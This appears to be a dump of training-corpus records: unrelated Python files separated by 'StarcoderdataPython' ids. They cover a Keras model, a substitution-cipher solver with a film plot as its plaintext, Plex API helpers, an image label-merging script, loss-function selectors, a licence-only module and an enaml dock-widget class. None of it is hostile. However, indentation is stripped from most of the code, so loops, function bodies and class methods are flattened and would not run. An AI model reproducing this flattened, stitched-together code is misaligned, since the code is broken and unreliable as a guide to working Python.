# model=keras.Sequential([
# layers.Dense(64,input_shape=(14,),activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(124,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(248,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.32),
# layers.Dense(512,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(664,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(512,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.32),
# layers.Dense(264,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(124,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(2,activation='sigmoid')
# ])
# Compiling the model with Adamax Optimizer
# model.compile(optimizer='adamax',loss='binary_crossentropy',metrics='accuracy')
# Creating the callback feature to stop the training in-Between, in case of no improvement
# call=callbacks.EarlyStopping(patience=20,min_delta=0.0001,restore_best_weights=True)
# Fitting the model to the training data
# history=model.fit(xtr,ytr,validation_data=(xval,yval),batch_size=28,epochs=150,callbacks=[call])
# Testing on the testing data
# model.evaluate(xte,yte)
# training=pd.DataFrame(history.history)
# training.loc[:,['loss','val_loss']].plot()
# training.loc[:,['accuracy','val_accuracy']].plot()
|
StarcoderdataPython
|
184565
|
from tr import tr
with open('ciphertext.txt') as file:
data = file.read()
alpha = {
'a': 0,
'b': 0,
'c': 0,
'd': 0,
'e': 0,
'f': 0,
'g': 0,
'h': 0,
'i': 0,
'j': 0,
'k': 0,
'l': 0,
'm': 0,
'n': 0,
'o': 0,
'p': 0,
'q': 0,
'r': 0,
's': 0,
't': 0,
'u': 0,
'v': 0,
'w': 0,
'x': 0,
'y': 0,
'z': 0,
}
# Find letter frequencies of ciphertext
for letter in data:
try:
alpha[letter] = alpha[letter] + 1
except:
continue
alphasort = {k: v for k, v in sorted(alpha.items(), key=lambda item: item[1])}
print(alphasort)
frequencies = ['e', 't', 'a', 'o', 'i']
dicto = 'ESIARNTOLCDUGPMKHBYFVWZXQJ'
texts = 'ETAOINSHRDLCUMWFGYPBVKXJQZ'
actual = 'ETASNRIOHDLPGBMCFUWYKVJZQX'
print(tr(u'ovymbkrsaenxhztjlcgqpwuifd', actual, data))
#clues: abilities, the, councels, cheats, attitude, spiderlike
'''
original text:
the next day peter finds he is no longer nearsighted and has developed spiderlike abilities
he can also shoot webs out of his wrists and has quick reflexes superhuman speed and strength
and a heightened ability to sense danger
having observed peters changed attitude ben confronts peter over this and counsels him that
with great power comes great responsibility peter ignores ben and enters an underground wrestling
tournament to win money with the intention to impress mary jane with a car
he wins his first match but the promoter cheats him of his earnings when a thief robs the promoters
office peter allows him to escape in retaliation moments later he finds that ben has been shot and
killed by a carjacker in the street
enraged peter pursues the carjacker only to learn that bens killer is the thief he let escape
the carjacker tries to flee but is killed after he falls out of a window
the goblin abducts and offers peter a place at his side but peter refuses during thanksgiving
dinner norman sees peters wound from a fight the previous day and realizes that he is spiderman
as revenge the goblin begins to strike at his loved ones hospitalizing may and taking mary jane
hostage alongside a tramcar full of children at queensboro bridge he tells peter to choose whether
to save mj or the children but peter manages to save both with some help from bystanders
'''
|
StarcoderdataPython
|
3260662
|
from typing import List
from xml.etree import ElementTree
import requests
import config
def section_create(section: str) -> None:
address = config.PLEX_SERVER_ADDRESS + '/library/sections'
headers = {
'X-Plex-Token': config.PLEX_TOKEN,
}
params = {
'name': section,
'type': 'show',
'agent': 'com.plexapp.agents.thetvdb',
'scanner': 'Plex Series Scanner',
'language': 'en',
'importFromiTunes': '',
'enableAutoPhotoTags': '',
# Specifies an arbitrary default location
'location': ('/non-existant-path/' + section)
}
response = requests.post(address, headers=headers, params=params)
def section_get_key(section: str) -> None:
address = config.PLEX_SERVER_ADDRESS + '/library/sections/'
headers = {
'X-Plex-Token': config.PLEX_TOKEN,
}
xml = requests.get(config.PLEX_SERVER_ADDRESS + '/library/sections',
headers=headers)
tree = ElementTree.fromstring(xml.content)
sectionkey = tree.find("./Directory[@title='" + section +
"']").attrib["key"]
return sectionkey
def section_set_locations(sectionkey: str, paths: List[str]):
address = config.PLEX_SERVER_ADDRESS + '/library/sections/' + str(
sectionkey)
headers = {
'X-Plex-Token': config.PLEX_TOKEN,
}
params = {'agent': 'com.plexapp.agents.thetvdb', 'location': paths}
response = requests.put(address, headers=headers, params=params)
|
StarcoderdataPython
|
88937
|
<filename>tools/mergeneighboursinlabelimage/mergeneighboursinlabelimage.py
import argparse
import sys
import skimage.io
import skimage.util
from skimage.measure import regionprops
import scipy.spatial.distance
import numpy as np
import warnings
def merge_n(img, dist=50):
props = regionprops(img)
found = False
for i in range(0, len(props)):
i_coords = props[i].coords
for q in range(0, len(props)):
if i==q:
continue
q_coords = props[q].coords
iq_dist = np.min(scipy.spatial.distance.cdist(i_coords, q_coords, 'euclidean'))
if iq_dist <= dist:
props[q].label = props[i].label
for a_point in range(0, q_coords.shape[0]):
img[q_coords[a_point, 0], q_coords[a_point, 1]] = props[i].label
found = True
if found:
merge_n(img, dist)
return img
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('input_file', type=argparse.FileType('r'), default=sys.stdin, help='input file')
parser.add_argument('out_file', type=argparse.FileType('w'), default=sys.stdin, help='out file (TIFF)')
parser.add_argument(
'-c',
dest='cluster_merge',
type=int,
required=False,
default=50,
help='Distance in pixel of clusters which are merged',
)
args = parser.parse_args()
label_image = skimage.io.imread(args.input_file.name)
label_image = merge_n(label_image, args.cluster_merge)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
res = skimage.util.img_as_uint(label_image)
skimage.io.imsave(args.out_file.name, res, plugin="tifffile")
|
StarcoderdataPython
|
150775
|
<reponame>solider245/OpenData
# encoding: UTF-8
def remove_chinese(str):
s = ""
for w in str:
if w >= u'\u4e00' and w <= u'\u9fa5':
continue
s += w
return s
def remove_non_numerical(s):
f = ''
for i in range(len(s)):
try:
f = float(s[:i+1])
except:
return f
return str(f)
|
StarcoderdataPython
|
138580
|
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import torch
import torch.nn as nn
from tacotron2.loss_function import Tacotron2Loss
from waveglow.loss_function import WaveGlowLoss
def get_loss_function(loss_function, sigma=1.0):
if loss_function == 'Tacotron2':
loss = Tacotron2Loss()
elif loss_function == 'WaveGlow':
loss = WaveGlowLoss(sigma=sigma)
else:
raise NotImplementedError(
"unknown loss function requested: {}".format(loss_function))
loss.cuda()
return loss
|
StarcoderdataPython
|
1615693
|
"""
Entities containing shapes
.. automodule:: ote_sdk.entities.shapes.rectangle
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.circle
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.polygon
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.shape
:members:
:undoc-members:
"""
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
# from .rectangle import *
# from .circle import *
# from .polygon import *
# from .shape import *
|
StarcoderdataPython
|
135234
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from enaml.qt.QtCore import Qt, QRect, QSize, QPoint, QTimer, Signal
from enaml.qt.QtGui import QApplication, QFrame, QLayout
from .event_types import (
QDockItemEvent, DockItemShown, DockItemHidden, DockItemClosed
)
from .q_dock_tab_widget import QDockTabWidget
from .q_dock_title_bar import QDockTitleBar
from .utils import repolish
class _AlertData(object):
""" A private class which stores the data needed for item alerts.
"""
def __init__(self, timer, level, on, off, repeat, persist):
self.timer = timer
self.level = level
self.on = on
self.off = off
self.repeat = repeat
self.persist = persist
self.remaining = repeat
self.active = False
class QDockItemLayout(QLayout):
""" A QLayout subclass for laying out a dock item.
"""
def __init__(self, parent=None):
""" Initialize a QDockAreaLayout.
Parameters
----------
parent : QWidget or None
The parent widget owner of the layout.
"""
super(QDockItemLayout, self).__init__(parent)
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
self._title_bar = None
self._dock_widget = None
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def titleBarWidget(self):
""" Get the title bar widget set for the layout.
Returns
-------
result : IDockItemTitleBar or None
The title bar widget for the layout, or None if no widget
is applied.
"""
return self._title_bar
def setTitleBarWidget(self, title_bar):
""" Set the title bar widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
title_bar : IDockItemTitleBar or None
A concrete implementor of the title bar interface, or None.
"""
old_bar = self._title_bar
if old_bar is not None:
old_bar.hide()
old_bar.setParent(None)
self._title_bar = title_bar
if title_bar is not None:
title_bar.setParent(self.parentWidget())
self.invalidate()
def dockWidget(self):
""" Get the dock widget set for the layout.
Returns
-------
result : QWidget
The primary widget set in the dock item layout.
"""
return self._dock_widget
def setDockWidget(self, widget):
""" Set the dock widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
widget : QWidget
The widget to use as the primary content in the layout.
"""
old_widget = self._dock_widget
if widget is old_widget:
return
if old_widget is not None:
old_widget.hide()
old_widget.setParent(None)
self._dock_widget = widget
if widget is not None:
widget.setParent(self.parentWidget())
self.invalidate()
#--------------------------------------------------------------------------
# QLayout API
#--------------------------------------------------------------------------
def invalidate(self):
""" Invalidate the layout.
"""
super(QDockItemLayout, self).invalidate()
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
def setGeometry(self, rect):
""" Set the geometry for the items in the layout.
"""
super(QDockItemLayout, self).setGeometry(rect)
title = self._title_bar
widget = self._dock_widget
title_rect = QRect(rect)
widget_rect = QRect(rect)
if title is not None and not title.isHidden():
msh = title.minimumSizeHint()
title_rect.setHeight(msh.height())
widget_rect.setTop(title_rect.bottom() + 1)
title.setGeometry(title_rect)
if widget is not None and not widget.isHidden():
widget.setGeometry(widget_rect)
def sizeHint(self):
""" Get the size hint for the layout.
"""
sh = self._size_hint
if not sh.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.sizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.sizeHint()
width = max(width, hint.width())
height += hint.height()
sh = self._size_hint = QSize(width, height)
return sh
def minimumSize(self):
""" Get the minimum size for the layout.
"""
ms = self._min_size
if not ms.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.minimumSizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.minimumSizeHint()
width = max(width, hint.width())
height += hint.height()
ms = self._min_size = QSize(width, height)
return ms
def maximumSize(self):
""" Get the maximum size for the layout.
"""
ms = self._max_size
if not ms.isValid():
widget = self._dock_widget
parent = self.parentWidget()
if widget is not None and parent.isFloating():
ms = widget.maximumSize()
title = self._title_bar
if title is not None and not title.isHidden():
height = ms.height() + title.minimumSizeHint().height()
ms.setHeight(min(16777215, height))
else:
ms = QSize(16777215, 16777215)
self._max_size = ms
return ms
#--------------------------------------------------------------------------
# QLayout Abstract API
#--------------------------------------------------------------------------
def addItem(self, item):
""" A required virtual method implementation.
"""
msg = 'Use `setTitleBarWidget | setDockWidget` instead.'
raise NotImplementedError(msg)
def count(self):
""" A required virtual method implementation.
This method should not be used and returns a constant value.
"""
return 0
def itemAt(self, idx):
""" A virtual method implementation which returns None.
"""
return None
def takeAt(self, idx):
""" A virtual method implementation which does nothing.
"""
return None
class QDockItem(QFrame):
""" A QFrame subclass which acts as an item QDockArea.
"""
#: A signal emitted when the maximize button is clicked. This
#: signal is proxied from the current dock item title bar.
maximizeButtonClicked = Signal(bool)
#: A signal emitted when the restore button is clicked. This
#: signal is proxied from the current dock item title bar.
restoreButtonClicked = Signal(bool)
#: A signal emitted when the close button is clicked. This
#: signal is proxied from the current dock item title bar.
closeButtonClicked = Signal(bool)
#: A signal emitted when the link button is toggled. This
#: signal is proxied from the current dock item title bar.
linkButtonToggled = Signal(bool)
#: A signal emitted when the pin button is toggled. This
#: signal is proxied from the current dock item title bar.
pinButtonToggled = Signal(bool)
#: A signal emitted when the title is edited by the user. This
#: signal is proxied from the current dock item title bar.
titleEdited = Signal(unicode)
#: A signal emitted when the empty area is left double clicked.
#: This signal is proxied from the current dock item title bar.
titleBarLeftDoubleClicked = Signal(QPoint)
#: A signal emitted when the empty area is right clicked. This
#: signal is proxied from the current dock item title bar.
titleBarRightClicked = Signal(QPoint)
#: A signal emitted when the item is alerted. The payload is the
#: new alert level. An empty string indicates no alert.
alerted = Signal(unicode)
def __init__(self, parent=None):
""" Initialize a QDockItem.
Parameters
----------
parent : QWidget, optional
The parent of the dock item.
"""
super(QDockItem, self).__init__(parent)
layout = QDockItemLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
self.setLayout(layout)
self.setTitleBarWidget(QDockTitleBar())
self.alerted.connect(self._onAlerted)
self._manager = None # Set and cleared by the DockManager
self._alert_data = None
self._vis_changed = None
self._closable = True
self._closing = False
#--------------------------------------------------------------------------
# Reimplementations
#--------------------------------------------------------------------------
def close(self):
""" Handle the close request for the dock item.
"""
self._closing = True
try:
super(QDockItem, self).close()
finally:
self._closing = False
def closeEvent(self, event):
""" Handle the close event for the dock item.
This handler will reject the event if the item is not closable.
"""
event.ignore()
if self._closable:
event.accept()
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
event = QDockItemEvent(DockItemClosed, self.objectName())
QApplication.postEvent(area, event)
def showEvent(self, event):
""" Handle the show event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).showEvent(event)
self._postVisibilityChange(True)
def hideEvent(self, event):
""" Handle the hide event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).hideEvent(event)
# Don't post when closing; A closed event is posted instead.
if not self._closing:
self._postVisibilityChange(False)
def mousePressEvent(self, event):
""" Handle the mouse press event for the dock item.
This handler will clear any alert level on a left click.
"""
if event.button() == Qt.LeftButton:
self.clearAlert()
super(QDockItem, self).mousePressEvent(event)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def manager(self):
""" Get the dock manager for this dock item.
Returns
-------
result : DockManager or None
The dock manager which is managing this item.
"""
return self._manager
def rootDockArea(self):
""" Get the root dock area for this dock item.
Returns
-------
result : QDockArea or None
The root dock area for this dock item.
"""
manager = self._manager
if manager is not None:
return manager.dock_area()
def title(self):
""" Get the title for the dock item.
Returns
-------
result : unicode
The unicode title for the dock item.
"""
return self.titleBarWidget().title()
def setTitle(self, title):
""" Set the title for the dock item.
Parameters
----------
title : unicode
The unicode title to use for the dock item.
"""
self.titleBarWidget().setTitle(title)
# A concession to practicality: walk the ancestry and update
# the tab title if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setTabText(index, title)
def icon(self):
""" Get the icon for the dock item.
Returns
-------
result : QIcon
The icon in use for the dock item.
"""
return self.titleBarWidget().icon()
def setIcon(self, icon):
""" Set the icon for the dock item.
Parameters
----------
icon : QIcon
The icon to use for the dock item.
"""
self.titleBarWidget().setIcon(icon)
# A concession to practicality: walk the ancestry and update
# the tab icon if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setTabIcon(index, icon)
def iconSize(self):
""" Get the icon size for the title bar.
Returns
-------
result : QSize
The size to use for the icons in the title bar.
"""
return self.titleBarWidget().iconSize()
def setIconSize(self, size):
""" Set the icon size for the title bar.
Parameters
----------
icon : QSize
The icon size to use for the title bar. Icons smaller than
this size will not be scaled up.
"""
self.titleBarWidget().setIconSize(size)
def isLinked(self):
""" Get whether or not this dock item is linked.
Returns
-------
result : bool
True if the item is linked, False otherwise.
"""
return self.titleBarWidget().isLinked()
def setLinked(self, linked):
""" Set whether or not the dock item is linked.
Parameters
----------
linked : bool
True if the dock item should be linked, False otherwise.
"""
self.titleBarWidget().setLinked(linked)
def isPinned(self):
""" Get whether or not this dock item is pinned.
Returns
-------
result : bool
True if the item is pinned, False otherwise.
"""
return self.titleBarWidget().isPinned()
def setPinned(self, pinned, quiet=False):
""" Set whether or not the dock item is pinned.
Parameters
----------
pinned : bool
True if the dock item should be pinned, False otherwise.
quiet : bool, optional
True if the state should be set without emitted the toggled
signal. The default is False.
"""
self.titleBarWidget().setPinned(pinned, quiet)
def isFloating(self):
""" Get whether the dock item is free floating.
"""
container = self.parent()
if container is not None:
return container.isWindow()
return self.isWindow()
def titleEditable(self):
""" Get whether the title is user editable.
Returns
-------
result : bool
True if the title is user editable, False otherwise.
"""
return self.titleBarWidget().isEditable()
def setTitleEditable(self, editable):
""" Set whether or not the title is user editable.
Parameters
----------
editable : bool
True if the title is user editable, False otherwise.
"""
self.titleBarWidget().setEditable(editable)
def titleBarForceHidden(self):
""" Get whether or not the title bar is force hidden.
Returns
-------
result : bool
Whether or not the title bar is force hidden.
"""
return self.titleBarWidget().isForceHidden()
def setTitleBarForceHidden(self, hidden):
""" Set the force hidden state of the title bar.
Parameters
----------
hidden : bool
True if the title bar should be hidden, False otherwise.
"""
self.titleBarWidget().setForceHidden(hidden)
def closable(self):
""" Get whether or not the dock item is closable.
Returns
-------
result : bool
True if the dock item is closable, False otherwise.
"""
return self._closable
def setClosable(self, closable):
""" Set whether or not the dock item is closable.
Parameters
----------
closable : bool
True if the dock item is closable, False otherwise.
"""
if closable != self._closable:
self._closable = closable
bar = self.titleBarWidget()
buttons = bar.buttons()
if closable:
buttons |= bar.CloseButton
else:
buttons &= ~bar.CloseButton
bar.setButtons(buttons)
# A concession to practicality: walk the ancestry and update
# the tab close button if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setCloseButtonVisible(index, closable)
def titleBarWidget(self):
""" Get the title bar widget for the dock item.
If a custom title bar has not been assigned, a default title
bar will be returned. To prevent showing a title bar, set the
visibility on the returned title bar to False.
Returns
-------
result : IDockItemTitleBar
An implementation of IDockItemTitleBar. This will never be
None.
"""
layout = self.layout()
bar = layout.titleBarWidget()
if bar is None:
bar = QDockTitleBar()
self.setTitleBarWidget(bar)
return bar
def setTitleBarWidget(self, title_bar):
""" Set the title bar widget for the dock item.
Parameters
----------
title_bar : IDockItemTitleBar or None
A custom implementation of IDockItemTitleBar, or None. If
None, then the default title bar will be restored.
"""
layout = self.layout()
old = layout.titleBarWidget()
if old is not None:
old.maximizeButtonClicked.disconnect(self.maximizeButtonClicked)
old.restoreButtonClicked.disconnect(self.restoreButtonClicked)
old.closeButtonClicked.disconnect(self.closeButtonClicked)
old.linkButtonToggled.disconnect(self.linkButtonToggled)
old.pinButtonToggled.disconnect(self.pinButtonToggled)
old.titleEdited.disconnect(self.titleEdited)
old.leftDoubleClicked.disconnect(self.titleBarLeftDoubleClicked)
old.rightClicked.disconnect(self.titleBarRightClicked)
title_bar = title_bar or QDockTitleBar()
title_bar.maximizeButtonClicked.connect(self.maximizeButtonClicked)
title_bar.restoreButtonClicked.connect(self.restoreButtonClicked)
title_bar.closeButtonClicked.connect(self.closeButtonClicked)
title_bar.linkButtonToggled.connect(self.linkButtonToggled)
title_bar.pinButtonToggled.connect(self.pinButtonToggled)
title_bar.titleEdited.connect(self.titleEdited)
title_bar.leftDoubleClicked.connect(self.titleBarLeftDoubleClicked)
title_bar.rightClicked.connect(self.titleBarRightClicked)
layout.setTitleBarWidget(title_bar)
def dockWidget(self):
""" Get the dock widget for this dock item.
Returns
-------
result : QWidget or None
The dock widget being managed by this item.
"""
return self.layout().dockWidget()
def setDockWidget(self, widget):
""" Set the dock widget for this dock item.
Parameters
----------
widget : QWidget
The QWidget to use as the dock widget in this item.
"""
self.layout().setDockWidget(widget)
def alert(self, level, on=250, off=250, repeat=4, persist=False):
""" Set the alert level on the dock item.
This will override any currently applied alert level.
Parameters
----------
level : unicode
The alert level token to apply to the dock item.
on : int
The duration of the 'on' cycle, in ms. A value of -1 means
always on.
off : int
The duration of the 'off' cycle, in ms. If 'on' is -1, this
value is ignored.
repeat : int
The number of times to repeat the on-off cycle. If 'on' is
-1, this value is ignored.
persist : bool
Whether to leave the alert in the 'on' state when the cycles
finish. If 'on' is -1, this value is ignored.
"""
if self._alert_data is not None:
self.clearAlert()
app = QApplication.instance()
app.focusChanged.connect(self._onAppFocusChanged)
timer = QTimer()
timer.setSingleShot(True)
timer.timeout.connect(self._onAlertTimer)
on, off, repeat = max(-1, on), max(0, off), max(1, repeat)
self._alert_data = _AlertData(timer, level, on, off, repeat, persist)
if on < 0:
self.alerted.emit(level)
else:
self._onAlertTimer()
def clearAlert(self):
""" Clear the current alert level, if any.
"""
if self._alert_data is not None:
self._alert_data.timer.stop()
self._alert_data = None
app = QApplication.instance()
app.focusChanged.disconnect(self._onAppFocusChanged)
self.alerted.emit(u'')
#--------------------------------------------------------------------------
# Private API
#--------------------------------------------------------------------------
def _onAlertTimer(self):
""" Handle the alert data timer timeout.
This handler will refresh the alert level for the current tick,
or clear|persist the alert level if the ticks have expired.
"""
data = self._alert_data
if data is not None:
if not data.active:
data.active = True
data.timer.start(data.on)
self.alerted.emit(data.level)
else:
data.active = False
data.remaining -= 1
if data.remaining > 0:
data.timer.start(data.off)
self.alerted.emit(u'')
elif data.persist:
data.timer.stop()
self.alerted.emit(data.level)
else:
self.clearAlert()
def _onAlerted(self, level):
""" A signal handler for the 'alerted' signal.
This handler will set the 'alert' dynamic property on the
dock item, the title bar, and the title bar label, and then
repolish all three items.
"""
level = level or None
title_bar = self.titleBarWidget()
label = title_bar.label()
self.setProperty(u'alert', level)
title_bar.setProperty(u'alert', level)
label.setProperty(u'alert', level)
repolish(label)
repolish(title_bar)
repolish(self)
def _onAppFocusChanged(self, old, new):
""" A signal handler for the 'focusChanged' app signal
This handler will clear the alert if one of the descendant
widgets or the item itself gains focus.
"""
while new is not None:
if new is self:
self.clearAlert()
break
new = new.parent()
def _onVisibilityTimer(self):
""" Handle the visibility timer timeout.
This handler will post the dock item visibility event to the
root dock area.
"""
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
timer, visible = self._vis_changed
evt_type = DockItemShown if visible else DockItemHidden
event = QDockItemEvent(evt_type, self.objectName())
QApplication.postEvent(area, event)
self._vis_changed = None
def _postVisibilityChange(self, visible):
""" Post a visibility changed event for the dock item.
This method collapses the post on a timer and will not emit
the event when the visibility temporarily toggles bettwen
states.
Parameters
----------
visible : bool
True if the item was show, False if the item was hidden.
"""
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
vis_changed = self._vis_changed
if vis_changed is None:
timer = QTimer()
timer.setSingleShot(True)
timer.timeout.connect(self._onVisibilityTimer)
self._vis_changed = (timer, visible)
timer.start()
else:
timer, old_visible = vis_changed
if old_visible != visible:
self._vis_changed = None
timer.stop()
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.